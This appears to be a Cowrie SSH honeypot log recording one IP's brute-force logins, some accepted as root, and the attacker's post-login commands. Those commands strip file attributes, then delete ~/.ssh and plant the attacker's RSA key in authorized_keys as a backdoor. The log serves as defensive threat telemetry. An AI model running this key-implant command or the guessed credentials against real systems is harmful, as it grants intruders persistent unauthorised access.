{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:09:25.025917Z","src_ip":"212.227.235.229","session":"184d3e7dd20d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:09:25.026816Z","src_ip":"212.227.235.229","session":"184d3e7dd20d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:25.275154Z","src_ip":"212.227.235.229","session":"184d3e7dd20d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:09:25.890745Z","src_ip":"212.227.235.229","session":"184d3e7dd20d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:09:25.891571Z","src_ip":"212.227.235.229","session":"184d3e7dd20d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59242,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bfa70701984","protocol":"ssh","message":"New connection: 212.227.235.229:59242 (1.2.3.4:22) [session: 2bfa70701984]","sensor":"my-vps","timestamp":"2025-09-08T22:09:26.041247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:09:26.041893Z","src_ip":"212.227.235.229","session":"2bfa70701984"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:09:26.141172Z","src_ip":"212.227.235.229","session":"184d3e7dd20d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:26.142071Z","src_ip":"212.227.235.229","session":"184d3e7dd20d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:09:26.372890Z","src_ip":"212.227.235.229","session":"2bfa70701984"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51380,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0f7b39289c6","protocol":"ssh","message":"New connection: 212.227.235.229:51380 (1.2.3.4:22) [session: b0f7b39289c6]","sensor":"my-vps","timestamp":"2025-09-08T22:09:26.513274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:09:26.514841Z","src_ip":"212.227.235.229","session":"b0f7b39289c6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:09:26.564579Z","src_ip":"212.227.235.229","session":"7a04edc4a2fb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:09:26.824626Z","src_ip":"212.227.235.229","session":"b0f7b39289c6"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-09-08T22:09:27.731141Z","src_ip":"212.227.235.229","session":"2bfa70701984"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:27.821566Z","src_ip":"212.227.235.229","session":"7a04edc4a2fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40942,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8fc15a85a53","protocol":"ssh","message":"New connection: 212.227.235.229:40942 (1.2.3.4:22) [session: f8fc15a85a53]","sensor":"my-vps","timestamp":"2025-09-08T22:09:28.068578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:09:28.070503Z","src_ip":"212.227.235.229","session":"f8fc15a85a53"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:09:28.106653Z","src_ip":"212.227.235.229","session":"b0f7b39289c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:09:28.320772Z","src_ip":"212.227.235.229","session":"f8fc15a85a53"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:29.063065Z","src_ip":"212.227.235.229","session":"2bfa70701984"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:29.418609Z","src_ip":"212.227.235.229","session":"b0f7b39289c6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51384,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5a07a620a2b","protocol":"ssh","message":"New connection: 212.227.235.229:51384 (1.2.3.4:22) [session: a5a07a620a2b]","sensor":"my-vps","timestamp":"2025-09-08T22:09:29.729331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:09:29.730403Z","src_ip":"212.227.235.229","session":"a5a07a620a2b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:09:30.041813Z","src_ip":"212.227.235.229","session":"a5a07a620a2b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:09:31.327324Z","src_ip":"212.227.235.229","session":"a5a07a620a2b"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:31.577864Z","src_ip":"212.227.235.229","session":"184d3e7dd20d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:31.640131Z","src_ip":"212.227.235.229","session":"a5a07a620a2b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:09:32.011306Z","src_ip":"212.227.235.229","session":"f8fc15a85a53"}
{"eventid":"cowrie.session.closed","duration":"12.9","message":"Connection lost after 12.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:32.262150Z","src_ip":"212.227.235.229","session":"6c51995fe12c"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:32.579344Z","src_ip":"212.227.235.229","session":"f8fc15a85a53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37900,"dst_ip":"1.2.3.4","dst_port":22,"session":"62e1a3593940","protocol":"ssh","message":"New connection: 212.227.235.229:37900 (1.2.3.4:22) [session: 62e1a3593940]","sensor":"my-vps","timestamp":"2025-09-08T22:09:45.350138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:09:45.351378Z","src_ip":"212.227.235.229","session":"62e1a3593940"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:09:45.520159Z","src_ip":"212.227.235.229","session":"62e1a3593940"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwers","message":"login attempt [root/Qwers] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:09:46.198066Z","src_ip":"212.227.235.229","session":"62e1a3593940"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:09:46.557669Z","src_ip":"212.227.235.229","session":"62e1a3593940"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:09:46.558466Z","src_ip":"212.227.235.229","session":"62e1a3593940"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:09:46.559649Z","src_ip":"212.227.235.229","session":"62e1a3593940"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:46.730453Z","src_ip":"212.227.235.229","session":"62e1a3593940"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:09:47.200488Z","src_ip":"212.227.235.229","session":"62e1a3593940"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:09:47.201330Z","src_ip":"212.227.235.229","session":"62e1a3593940"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:09:47.373605Z","src_ip":"212.227.235.229","session":"62e1a3593940"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:47.374442Z","src_ip":"212.227.235.229","session":"62e1a3593940"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37906,"dst_ip":"1.2.3.4","dst_port":22,"session":"2790c57c5d35","protocol":"ssh","message":"New connection: 212.227.235.229:37906 (1.2.3.4:22) [session: 2790c57c5d35]","sensor":"my-vps","timestamp":"2025-09-08T22:09:47.545541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:09:47.546480Z","src_ip":"212.227.235.229","session":"2790c57c5d35"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:09:47.717865Z","src_ip":"212.227.235.229","session":"2790c57c5d35"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:09:48.443891Z","src_ip":"212.227.235.229","session":"2790c57c5d35"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:49.618489Z","src_ip":"212.227.235.229","session":"2790c57c5d35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37908,"dst_ip":"1.2.3.4","dst_port":22,"session":"27510ac4eaa9","protocol":"ssh","message":"New connection: 212.227.235.229:37908 (1.2.3.4:22) [session: 27510ac4eaa9]","sensor":"my-vps","timestamp":"2025-09-08T22:09:49.804178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:09:49.805054Z","src_ip":"212.227.235.229","session":"27510ac4eaa9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:09:49.984418Z","src_ip":"212.227.235.229","session":"27510ac4eaa9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:09:50.745147Z","src_ip":"212.227.235.229","session":"27510ac4eaa9"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:50.917074Z","src_ip":"212.227.235.229","session":"62e1a3593940"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:09:50.926838Z","src_ip":"212.227.235.229","session":"27510ac4eaa9"}
